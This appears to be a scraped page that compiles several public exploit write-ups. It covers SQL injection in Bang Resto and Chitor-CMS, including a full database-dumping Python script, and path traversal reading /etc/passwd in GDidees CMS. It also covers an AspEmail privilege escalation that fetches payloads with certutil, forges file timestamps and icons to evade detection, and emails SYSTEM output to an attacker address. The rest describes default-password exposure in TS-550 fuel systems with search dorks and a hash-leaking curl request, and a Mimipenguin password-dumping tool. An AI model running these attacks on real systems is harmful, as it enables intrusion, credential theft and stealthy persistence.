HireHackking

# Exploit Title: Advanced Host Monitor v12.56 - Unquoted Service Path # Date: 2023-04-23 # CVE: CVE-2023-2417 # Exploit Author: MrEmpy # Vendor Homepage: https://www.ks-soft.net # Software Link: https://www.ks-soft.net/hostmon.eng/downpage.htm # Version: > 12.56 # Tested on: Windows 10 21H2 Title: ================ Advanced Host Monitor > 12.56 - Unquoted Service Path Summary: ================ An unquoted service path vulnerability has been discovered in Advanced Host Monitor version > 12.56 affecting the executable "C:\Program Files (x86)\HostMonitor\RMA-Win\rma_active.exe" . This vulnerability occurs when the service's path is misconfigured, allowing an attacker to run a malicious file instead of the legitimate executable associated with the service. An attacker with local user privileges could exploit this vulnerability to replace the legitimate RMA-Win\rma_active.exe service executable with a malicious file of the same name and located in a directory that has a higher priority than the legitimate directory. That way, when the service starts, it will run the malicious file instead of the legitimate executable, allowing the attacker to execute arbitrary code, gain unauthorized access to the compromised system, or stop the service from functioning. To exploit this vulnerability, an attacker would need local access to the system and the ability to write and replace files on the system. The vulnerability can be mitigated by correcting the service path to correctly quote the full path of the executable, including quotation marks. Furthermore, it is recommended that users keep software updated with the latest security updates and limit physical and network access to their systems to prevent malicious attacks. Proof of Concept: ================ C:\>sc qc ActiveRMAService [SC] QueryServiceConfig SUCCESS SERVICE_NAME: ActiveRMAService TYPE : 110 WIN32_OWN_PROCESS (interactive) START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\HostMonitor\RMA-Win\rma_active.exe /service LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : KS Active Remote Monitoring Agent DEPENDENCIES : SERVICE_START_NAME : LocalSystem

# Exploit Title: Swagger UI 4.1.3 - User Interface (UI) Misrepresentation of Critical Information # Date: 14 April, 2023 # Exploit Author: Rafael Cintra Lopes # Vendor Homepage: https://swagger.io/ # Version: < 4.1.3 # CVE: CVE-2018-25031 # Site: https://rafaelcintralopes.com.br/ # Usage: python swagger-exploit.py https://[swagger-page].com from selenium import webdriver from selenium.webdriver.common.desired_capabilities import DesiredCapabilities from selenium.webdriver.chrome.service import Service import time import json import sys if __name__ == "__main__": target = sys.argv[1] desired_capabilities = DesiredCapabilities.CHROME desired_capabilities["goog:loggingPrefs"] = {"performance": "ALL"} options = webdriver.ChromeOptions() options.add_argument("--headless") options.add_argument("--ignore-certificate-errors") options.add_argument("--log-level=3") options.add_experimental_option("excludeSwitches", ["enable-logging"]) # Browser webdriver path drive_service = Service("C:/chromedriver.exe") driver = webdriver.Chrome(service=drive_service, options=options, desired_capabilities=desired_capabilities) driver.get(target+"?configUrl=https://petstore.swagger.io/v2/hacked1.json") time.sleep(10) driver.get(target+"?url=https://petstore.swagger.io/v2/hacked2.json") time.sleep(10) logs = driver.get_log("performance") with open("log_file.json", "w", encoding="utf-8") as f: f.write("[") for log in logs: log_file = json.loads(log["message"])["message"] if("Network.response" in log_file["method"] or "Network.request" in log_file["method"] or "Network.webSocket" in log_file["method"]): f.write(json.dumps(log_file)+",") f.write("{}]") driver.quit() json_file_path = "log_file.json" with open(json_file_path, "r", encoding="utf-8") as f: logs = json.loads(f.read()) for log in logs: try: url = log["params"]["request"]["url"] if(url == "https://petstore.swagger.io/v2/hacked1.json"): print("[Possibly Vulnerable] " + target + "?configUrl=https://petstore.swagger.io/v2/swagger.json") if(url == "https://petstore.swagger.io/v2/hacked2.json"): print("[Possibly Vulnerable] " + target + "?url=https://petstore.swagger.io/v2/swagger.json") except Exception as e: pass

# Exploit Title: Bang Resto v1.0 - 'Multiple' SQL Injection # Date: 2023-04-02 # Exploit Author: Rahad Chowdhury # Vendor Homepage: https://www.hockeycomputindo.com/2021/05/restaurant-pos-source-code-free.html # Software Link: https://github.com/mesinkasir/bangresto/archive/refs/heads/main.zip # Version: 1.0 # Tested on: Windows 10, PHP 7.4.29, Apache 2.4.53 # CVE: CVE-2023-29849 *Affected Parameters:* btnMenuItemID, itemID, itemPrice, menuID, staffID, itemPrice, itemID[], itemqty[], btnMenuItemID *Steps to Reproduce:* 1. First login your staff panel. 2. then go to "order" menu and Select menu then create order and intercept request data using burp suite. so your request data will be: POST /bangresto/staff/displayitem.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 194 Origin: http://127.0.0.1 Referer: http://127.0.0.1/bangresto/staff/order.php Cookie: PHPSESSID=2rqvjgkoog89i6g7dn7evdkmk5 Connection: close btnMenuItemID=1&qty=1 3. "btnMenuItemID" parameter is vulnerable. Let's try to inject union based SQL Injection use this query ".1 union select 1,2,3,CONCAT_WS(0x203a20,0x557365723a3a3a3a20,USER(),0x3c62723e,0x44617461626173653a3a3a3a3a20,DATABASE(),0x3c62723e,0x56657273696f6e3a3a3a3a20,VERSION())-- -" in "btnMenuItemID" parameter. 4. Check browser you will see user, database and version informations. 5. You could also use sqlmap to dump the whole database by saving the web request from BurpSuite

#################################################################################################################### # Exploit Title: AspEmail 5.6.0.2 - Local Privilege Escalation # # Vulnerability Category: [Weak Services Permission - Binary Permission Vulnerability] # # Date: 13/04/2023 # # Exploit Author: Zer0FauLT [admindeepsec@proton.me] # # Vendor Homepage: https://www.aspemail.com # # Software Link: https://www.aspemail.com/download.html # # Product: AspEmail # # Version: AspEmail 5.6.0.2 and all # # Platform - Architecture : Windows - 32-bit | 64-bit | Any CPU # # Tested on: Windows Server 2016 and Windows Server 2019 # # CVE : 0DAY # #################################################################################################################### # ================================================================================================================== [+] C:\PenTest>whoami /priv PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ========================================= ======== SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeImpersonatePrivilege Impersonate a client after authentication Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Disabled # ================================================================================================================== * First, we will test whether the AspEmail service is active. * First of all, we perform a query to list the processes running in the system with normal user rights and test whether the process of the relevant service is running: [+] C:\PenTest>tasklist /svc | findstr EmailAgent.exe EmailAgent.exe 4400 Persits Software EmailAgent or [+] C:\PenTest>tasklist /svc | findstr EmailAgent64.exe EmailAgent64.exe 4400 Persits Software EmailAgent * We have detected that the process of the "Persits Software Email Agent" Service is state "RUNNING". * Now we know that AspEmail service is active. # ================================================================================================================== * We will need these: [+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/EmailAgent.exe "C:\Program Files (x86)\Persits Software\AspEmail\BIN\EmailAgentPrivESC.exe" <<<=== MyExploit [+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/nircmd.exe "C:\Program Files (x86)\Persits Software\AspEmail\BIN\nircmd.exe" [+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/Mail.exe "C:\Windows\Temp\Mail.exe" [+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/Run.exe "C:\Windows\Temp\Run.bat" [+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/PrivescCheck.ps1 "C:\PenTest\PrivescCheck.ps1" # ================================================================================================================== [+] C:\PenTest>powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck" Name: Persits Software EmailAgent ImagePath : "C:\Program Files (x86)\Persits Software\AspEmail\BIN\Email Agent.exe" /run User : LocalSystem ModifiablePath : C:\Program Files (x86)\Persits Software\AspEmail\BIN IdentityReference : Everyone Permissions : WriteOwner, Delete, WriteAttributes, Synchronize, ReadControl, ReadData/ListDirectory, AppendData/AddSubdirectory, WriteExtendedAttributes, WriteDAC, ReadAttributes, WriteData/AddFile, ReadExtendedAttributes, DeleteChild, Execute/Traverse Status : Unknown UserCanStart : False UserCanStop : False [+] C:\PenTest>del PrivescCheck.ps1 * We detected "Persits Software EmailAgent" Service "Binary Permission Vulnerability" in our checks. # ================================================================================================================== # [+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail" Successfully processed 0 files; Failed processing 1 files C:\Program Files (x86)\Persits Software\AspEmail: Access is denied. * We do not have permission to access subdirectories. # ================================================================================================================== [+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail\BIN" C:\Program Files (x86)\Persits Software\AspEmail\BIN Everyone:(OI)(CI)(F) DeepSecLab\psacln:(I)(OI)(CI)(N) DeepSecLab\psaadm:(I)(OI)(CI)(N) DeepSecLab\psaadm_users:(I)(OI)(CI)(N) BUILTIN\Administrators:(I)(F) CREATOR OWNER:(I)(OI)(CI)(IO)(F) APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(RX) NT SERVICE\TrustedInstaller:(I)(CI)(F) NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F) BUILTIN\Administrators:(I)(OI)(CI)(IO)(F) BUILTIN\Users:(I)(OI)(CI)(RX) APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(RX) * Unlike other directories, we have full privileges in the "BIN" directory of the service. * This is chmod 0777 - rwxrwxrwx in linux language. # ================================================================================================================== [+] C:\PenTest>WMIC Path Win32_LogicalFileSecuritySetting WHERE Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe" ASSOC /RESULTROLE:Owner /ASSOCCLASS:Win32_LogicalFileOwner /RESULTCLASS:Win32_SID __PATH \\DeepSecLab\root\cimv2:Win32_LogicalFileSecuritySetting.Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe" \\DeepSecLab\root\cimv2:Win32_SID.SID="S-1-5-32-544" root\cimv2 DeepSecLab {} 5 Win32_SID.SID="S-1-5-32-544" Win32_SID Win32_SID 2 Administrators {1, 2, 0, 0, 0, 0, 0, 5, 32, 0, 0, 0, 32, 2, 0, 0} BUILTIN S-1-5-32-544 16 [EmailAgent.exe] ===>>> Owner: BUILTIN\Administrators * We understood "EmailAgent.exe" processor was installed by the Administrator and the owner is the Administrator user. # ================================================================================================================== * Now we will take ownership of this directory as we will execute our operations under the "BIN" directory. [+] C:\PenTest>whoami DeepSecLab\Hacker [+] C:\PenTest>takeown /f "C:\Program Files (x86)\Persits Software\AspEmail\BIN" SUCCESS: The file (or folder): "C:\Program Files (x86)\Persits Software\AspEmail\BIN" now owned by user "DeepSecLab\Hacker". [+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail\BIN" /Grant DeepSecLab\Hacker:F processed file: C:\Program Files (x86)\Persits Software\AspEmail\BIN Successfully processed 1 files; Failed processing 0 files * Ok. All commands resulted successfully. We now have full privileges for this directory. # ================================================================================================================== * Now we will modify the EmailAgent file and inject a self-written malware. * We will be careful not to damage any files while doing this so that all transactions can be easily undone. [+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>ren EmailAgent.exe Null.EmailAgent.exe [+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>ren EmailAgentPrivESC.exe EmailAgent.exe # ================================================================================================================== [+] C:\Program Files (x86)\Persits Software\AspEmail\Bin>dir Volume in drive C has no label. Volume Serial Number is 0C8A-5291 Directory of C:\Program Files (x86)\Persits Software\AspEmail\Bin 14.04.2023 16:47 <DIR> . 14.04.2023 16:47 <DIR> .. 01.03.2004 15:55 143.360 AspEmail.dll 25.02.2004 16:23 188.416 AspUpload.dll 13.04.2023 22:00 12.288 EmailAgent.exe <<<=== ReNamed for EmailAgentPrivESC.exe 24.09.2003 09:22 139.264 EmailAgentCfg.cpl 24.09.2003 09:25 94.208 EmailLogger.dll 24.09.2003 09:21 167.936 Null.EmailAgent.exe 6 File(s) 745.472 bytes 2 Dir(s) 165.936.717.824 bytes free # ================================================================================================================== * We are now making the settings on Last Modified Date, Creation Date and Last Accessed Date. [+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>nircmd.exe setfiletime "EmailAgent.exe" "24.03.2007 09:21:30" "24.03.2007 09:21:30" "23.05.2017 06:42:28" [+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>del nircmd.exe * And next is we are making extracting the real EmailAgent.exe file icon and changing the icon for exploit. This way, we will make it harder to detect. * I used the Resource Tuner Console tool. >>> http://www.restuner.com/tour-resource-tuner-console.htm * This can be done easily with the Resource Tuner tool. >>> http://www.resource-editor.com/how-to-change-icons-in-exe.html >>> http://www.restuner.com/download.htm # ================================================================================================================== [+] C:\Program Files (x86)\Persits Software\AspEmail\Bin>dir Volume in drive C has no label. Volume Serial Number is 0C8A-5291 Directory of C:\Program Files (x86)\Persits Software\AspEmail\Bin 14.04.2023 16:47 <DIR> . 14.04.2023 16:47 <DIR> .. 01.03.2004 15:55 143.360 AspEmail.dll 25.02.2004 16:23 188.416 AspUpload.dll 24.09.2003 09:21 12.288 EmailAgent.exe 24.09.2003 09:22 139.264 EmailAgentCfg.cpl 24.09.2003 09:25 94.208 EmailLogger.dll 24.09.2003 09:21 167.936 Null.EmailAgent.exe 6 File(s) 745.472 bytes 2 Dir(s) 165.936.717.824 bytes free [24.09.2003 09:21] 12.288 EmailAgent.exe [24.09.2003 09:21] 167.936 Null.EmailAgent.exe * And time manipulation is over. They look like they were uploaded at the same time long ago. # ================================================================================================================== * Now we check for my malware ownership. [+] C:\PenTest>WMIC Path Win32_LogicalFileSecuritySetting WHERE Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe" ASSOC /RESULTROLE:Owner /ASSOCCLASS:Win32_LogicalFileOwner /RESULTCLASS:Win32_SID __PATH \\DeepSecLab\root\cimv2:Win32_LogicalFileSecuritySetting.Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe" \\DeepSecLab\root\cimv2:Win32_SID.SID="S-1-5-21-3674093405-176013069-2091862131-1511" root\cimv2 DeepSecLab {} 5 Win32_SID.SID="S-1-5-21-3674093405-176013069-2091862131-1511" Win32_SID Win32_SID 2 Hacker {1, 5, 0, 0, 0, 0, 0, 5, 21, 0, 0, 0, 93, 55, 254, 218, 13, 191, 125, 10, 115, 72, 175, 124, 231, 5, 0, 0} DeepSecLab S-1-5-21-3674093405-176013069-2091862131-1511 28 [+] C:\PenTest>WMIC UserAccount WHERE sid="S-1-5-21-3674093405-176013069-2091862131-1511" GET Name Name DeepSecLab\Hacker EmailAgent.exe Owner: DeepSecLab\Hacker # =================================================================================================================# # # #################################################################################################################### # #[EmailAgent.cs]# # #################################################################################################################### # # # * We program this malware in such a way that when the server is reboot(when the services are restarted), # * It will be triggered and execute the codes we want, # * And then send a printout of all this to the email address we specified. # # using System; # using System.Linq; # using System.Text; # using System.Diagnostics; # using System.IO; # using System.Collections; # # Namespace CliToolSpace # { # class _Main # { # static void Main(string[] args) # { # Cli commandLine = new Cli(); # commandLine.FileToCli(@"C:\Windows\Temp\Mail.exe & C:\Windows\Temp\Run.bat"); # commandLine.Execute(); # commandLine.ToFile(@"C:\Windows\Temp\"); # } # } # } # # # # #################################################################################################################### # #[Mail.cs]# # #################################################################################################################### # # # using System; # using System.Net.Mail; # using System.Net; # SmtpClient SmtpServer = new SmtpClient("smtp.deepseclab.com"); # var mail = new MailMessage(); # mail.From = new MailAddress("mail@deepseclab.com"); # mail.To.Add("mail@hacker.com"); # mail.Subject = "Trigger Successful!"; # mail.IsBodyHtml = true; # string htmlBody; # htmlBody = "<strong>This server has been rebooted.</strong>"; # mail.Body = htmlBody; # Attachment attachment; # attachment = new Attachment(@"C:\Windows\Temp\Export.txt"); # mail.Attachments.Add(attachment); # SmtpServer.Port = 587; # SmtpServer.UseDefaultCredentials = false; # SmtpServer.Credentials = new System.Net.NetworkCredential("mail@deepseclab.com","p@ssw0rd123"); # SmtpServer.EnableSsl = true; # SmtpServer.Timeout = int.MaxValue; # SmtpServer.Send(mail); # # # # #################################################################################################################### # #[Run.bat]# # #################################################################################################################### # # # whoami > C:\Windows\Temp\Export.txt # cd C:\Program Files (x86)\Persits Software\AspEmail\Bin # del EmailAgent.exe & ren Null.EmailAgent.exe EmailAgent.exe # cd c:\Windows\Tasks # del Run.bat & del Mail.exe # # # # #################################################################################################################### # # [+]Trigger Successful![+] # # [+] C:\PenTest>systeminfo | findstr "Boot Time" # System Boot Time: 13.04.2022, 07:46:06 # # # # #################################################################################################################### #[Export.txt]# # #################################################################################################################### # # # NT AUTHORITY\SYSTEM # # # # #################################################################################################################### # # # ================================================================================================================== # ...|||[FIX]|||... # # ================================================================================================================== # [+] C:\>Runas /profile /user:DeepSecLab\Administrator CMD [+] # # =================================================================================================================# [+] C:\Administrator>sc qc "Persits Software EmailAgent" [SC] QueryServiceConfig SUCCESS SERVICE_Name: Persits Software EmailAgent TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_Name : "C:\Program Files (x86)\Persits Software\AspEmail\BIN\EmailAgent.exe" /run LOAD_ORDER_GROUP : TAG : 0 DISPLAY_Name : Persits Software EmailAgent DEPENDENCIES : rpcss SERVICE_START_Name : LocalSystem # ================================================================================================================== [+] C:\Administrator>sc sdshow "Persits Software EmailAgent" D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD) # ================================================================================================================== [+] C:\Administrator>accesschk64.exe -wuvc "Persits Software EmailAgent" -accepteula Accesschk v6.15 - Reports effective permissions for securable objects Copyright (C) 2006-2022 Mark Russinovich Sysinternals - www.sysinternals.com Persits Software EmailAgent Medium Mandatory Level (Default) [No-Write-Up] RW NT AUTHORITY\SYSTEM SERVICE_ALL_ACCESS RW BUILTIN\Administrators SERVICE_ALL_ACCESS # ================================================================================================================== [+] C:\Administrator>ICACLS "C:\Program Files (x86)\Persits Software" /T /Q /C /RESET [+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail\BIN" Successfully processed 0 files; Failed processing 1 files C:\Program Files (x86)\Persits Software\AspEmail\Bin: Access is denied. DONE! # ================================================================================================================== [+] C:\Administrator>sc stop "Persits Software EmailAgent" [+] PS C:\Administrator> Start-Service -Name "Persits Software EmailAgent" * These commands are optional. Used to stop the "Persits Software EmailAgent" service. We fixed the vulnerability and I don't think it's necessary anymore. # ==================================================================================================================

Mimipenguin beta-2.0 A tool to dump the login password from the current linux desktop user. Adapted from the idea behind the popular Windows tool mimikatz. alt text Details This version of Mimipenguin sacrifices features and coverage (as opposed to the beta-1.0 py and sh scripts) in favor of speed and efficiency. Beta 2.0 uses hardcoded offsets for known structures in memory along with PTRACE to reliably extract cleartext user passwords from linux desktop environments. Project address : link

# Exploit Title: Franklin Fueling Systems TS-550 - Default Password # Date: 4/16/2023 # Exploit Author: parsa rezaie khiabanloo # Vendor Homepage: Franklin Fueling Systems (http://www.franklinfueling.com/) # Version: TS-550 # Tested on: Linux/Android(termux) Step 1 : attacker can using these dorks and access to find the panel inurl:"relay_status.html" inurl:"fms_compliance.html" inurl:"fms_alarms.html" inurl:"system_status.html" inurl:"system_reports.html' inurl:"tank_status.html" inurl:"sensor_status.html" inurl:"tank_control.html" inurl:"fms_reports.html" inurl:"correction_table.html" Step 2 : attacker can send request curl -H "Content-Type:text/xml" --data '<TSA_REQUEST_LIST><TSA_REQUEST COMMAND="cmdWebGetConfiguration"/></TSA_REQUEST_LIST>' http://IP:10001/cgi-bin/tsaws.cgi Step 3 : if get response that show like this <TSA_RESPONSE_LIST VERSION="2.0.0.6833" TIME_STAMP="2013-02-19T22:09:22Z" TIME_STAMP_LOCAL="2013-02-19T17:09:22" KEY="11111111" ROLE="roleGuest"><TSA_RESPONSE COMMAND="cmdWebGetConfiguration"><CONFIGURATION> <DEBUGGING LOGGING_ENABLED="false" LOGGING_PATH="/tmp"/> <ROLE_LIST> <ROLE NAME="roleAdmin" PASSWORD="YrKMc2T2BuGvQ"/> <ROLE NAME="roleUser" PASSWORD="2wd2DlEKUPTr2"/> <ROLE NAME="roleGuest" PASSWORD="YXFCsq2GXFQV2"/> </ROLE_LIST> Step 4 : attacker can crack the hashesh using john the ripper notice : most of the panels password is : admin Disclaimer: The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.

# Exploit Title: GDidees CMS 3.9.1 - Local File Disclosure # Date : 03/27/2023 # Exploit Author : Hadi Mene # Vendor Homepage : https://www.gdidees.eu/ # Software Link : https://www.gdidees.eu/cms-1-0.html # Version : 3.9.1 and earlier # Tested on : Debian 11 # CVE : CVE-2023-27179 ### Summary: GDidees CMS v3.9.1 and lower versions was discovered to contain a local file disclosure vulnerability via the filename parameter at /_admin/imgdownload.php. ### Description : Imgdownload.php is mainly used by the QR code generation module to download an QR code. The vulnerability occurs in line 4 where the filename parameter which will be opened later is not filtered or sanitized. Furthermore, there is no admin session check in this code as it should since only the admin user should normally be able to download QR code. Vulnerable Code : 3. if (isset($_GET["filename"])) { 4. $filename=$_GET["filename"]; ..... ..... 27. @readfile($filename) OR die(); ### POC : URL : https://[GDIDEESROOT]/_admin/imgdownload.php?filename=../../../../../../etc/passwd Exploitation using curl # curl http://192.168.0.32/cmsgdidees3.9.1-mysqli/_admin/imgdownload.php?filename=../../../../../etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt:x:100:65534::/nonexistent:/usr/sbin/nologin systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin ntp:x:104:110::/nonexistent:/usr/sbin/nologin messagebus:x:105:111::/nonexistent:/usr/sbin/nologin uuidd:x:106:112::/run/uuidd:/usr/sbin/nologin pulse:x:107:115:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin lightdm:x:108:117:Light Display Manager:/var/lib/lightdm:/bin/false hadi:x:1000:1000:hadi,,,:/home/hadi:/bin/bash systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin vboxadd:x:998:1::/var/run/vboxadd:/bin/false openldap:x:109:118:OpenLDAP Server Account,,,:/var/lib/ldap:/bin/false sshd:x:110:65534::/run/sshd:/usr/sbin/nologin mysql:x:111:120:MySQL Server,,,:/nonexistent:/bin/false ### References: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27179 https://nvd.nist.gov/vuln/detail/CVE-2023-27179 https://www.exploit-db.com/papers/12883

#!/usr/bin/python3 ####################################################### # # # Exploit Title: Chitor-CMS v1.1.2 - Pre-Auth SQL Injection # # Date: 2023/04/13 # # ExploitAuthor: msd0pe # # Project: https://github.com/waqaskanju/Chitor-CMS # # My Github: https://github.com/msd0pe-1 # # Patched the 2023/04/16: 69d3442 commit # # # ####################################################### __description__ = 'Chitor-CMS < 1.1.2 Pre-Auth SQL Injection.' __author__ = 'msd0pe' __version__ = '1.1' __date__ = '2023/04/13' class bcolors: PURPLE = '\033[95m' BLUE = '\033[94m' GREEN = '\033[92m' OCRA = '\033[93m' RED = '\033[91m' CYAN = '\033[96m' ENDC = '\033[0m' BOLD = '\033[1m' UNDERLINE = '\033[4m' class infos: INFO = "[" + bcolors.OCRA + bcolors.BOLD + "?" + bcolors.ENDC + bcolors.ENDC + "] " ERROR = "[" + bcolors.RED + bcolors.BOLD + "X" + bcolors.ENDC + bcolors.ENDC + "] " GOOD = "[" + bcolors.GREEN + bcolors.BOLD + "+" + bcolors.ENDC + bcolors.ENDC + "] " PROCESS = "[" + bcolors.BLUE + bcolors.BOLD + "*" + bcolors.ENDC + bcolors.ENDC + "] " import re import requests import optparse from prettytable import PrettyTable def DumpTable(url, database, table): header = {"User-Agent": "5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"} x = PrettyTable() columns = [] payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2Ccolumn_name))%2C0x716a6b6271) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=\"" + table + "\" AND table_schema=\"" + database + "\"-- -" u = requests.get(url + payload, headers=header) try: r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text) r = r[0].replace('\"',"").split(',') if r == []: pass else: for i in r: columns.append(i) pass except: pass x.field_names = columns payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2C " + str(columns).replace("[","").replace("]","").replace("\'","").replace(" ","") + "))%2C0x716a6b6271) FROM " + database + "." + table + "-- -" u = requests.get(url + payload, headers=header) try: r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text) r = r[0].replace('\"',"").split(',') if r == []: pass else: for i in r: i = i.split("xzmdpl") x.add_rows([i]) except ValueError: r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text) r = r[0].replace('\"',"").split(',') if r == []: pass else: for i in r: i = i.split("xzmdpl") i.append("") x.add_rows([i]) print(x) def ListTables(url, database): header = {"User-Agent": "5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"} x = PrettyTable() x.field_names = ["TABLES"] payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2Ctable_name))%2C0x716a6b6271) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x" + str(database).encode('utf-8').hex() + ")-- -" u = requests.get(url + payload, headers=header) try: r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text) r = r[0].replace('\"',"").split(',') if r == []: pass else: for i in r: x.add_row([i]) except: pass print(x) def ListDatabases(url): header = {"User-Agent": "5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"} x = PrettyTable() x.field_names = ["DATABASES"] payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2Cschema_name))%2C0x716a6b6271) FROM INFORMATION_SCHEMA.SCHEMATA-- -" u = requests.get(url + payload, headers=header) try: r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text) r = r[0].replace('\"',"").split(',') if r == []: pass else: for i in r: x.add_row([i]) except: pass print(x) def Main(): Menu = optparse.OptionParser(usage='python %prog [options]', version='%prog ' + __version__) Menu.add_option('-u', '--url', type="str", dest="url", help='target url') Menu.add_option('--dbs', action="store_true", dest="l_databases", help='list databases') Menu.add_option('-D', '--db', type="str", dest="database", help='select a database') Menu.add_option('--tables', action="store_true", dest="l_tables", help='list tables') Menu.add_option('-T', '--table', type="str", dest="table", help='select a table') Menu.add_option('--dump', action="store_true", dest="dump", help='dump the content') (options, args) = Menu.parse_args() Examples = optparse.OptionGroup(Menu, "Examples", """python3 chitor1.1.py -u http://127.0.0.1 --dbs python3 chitor1.1.py -u http://127.0.0.1 -D chitor_db --tables python3 chitor1.1.py -u http://127.0.0.1 -D chitor_db -T login --dump """) Menu.add_option_group(Examples) if len(args) != 0 or options == {'url': None, 'l_databases': None, 'database': None, 'l_tables': None, 'table': None, 'dump': None}: Menu.print_help() print('') print(' %s' % __description__) print(' Source code put in public domain by ' + bcolors.PURPLE + bcolors.BOLD + 'msd0pe' + bcolors.ENDC + bcolors.ENDC + ',' + bcolors.RED + bcolors.BOLD + 'no Copyright' + bcolors.ENDC + bcolors.ENDC) print(' Any malicious or illegal activity may be punishable by law') print(' Use at your own risk') elif len(args) == 0: try: if options.url != None: if options.l_databases != None: ListDatabases(options.url) if options.database != None: if options.l_tables != None: ListTables(options.url, options.database) if options.table != None: if options.dump != None: DumpTable(options.url, options.database, options.table) except: print("Unexpected error") if __name__ == '__main__': try: Main() except KeyboardInterrupt: print() print(infos.PROCESS + "Exiting...") print() exit(1)

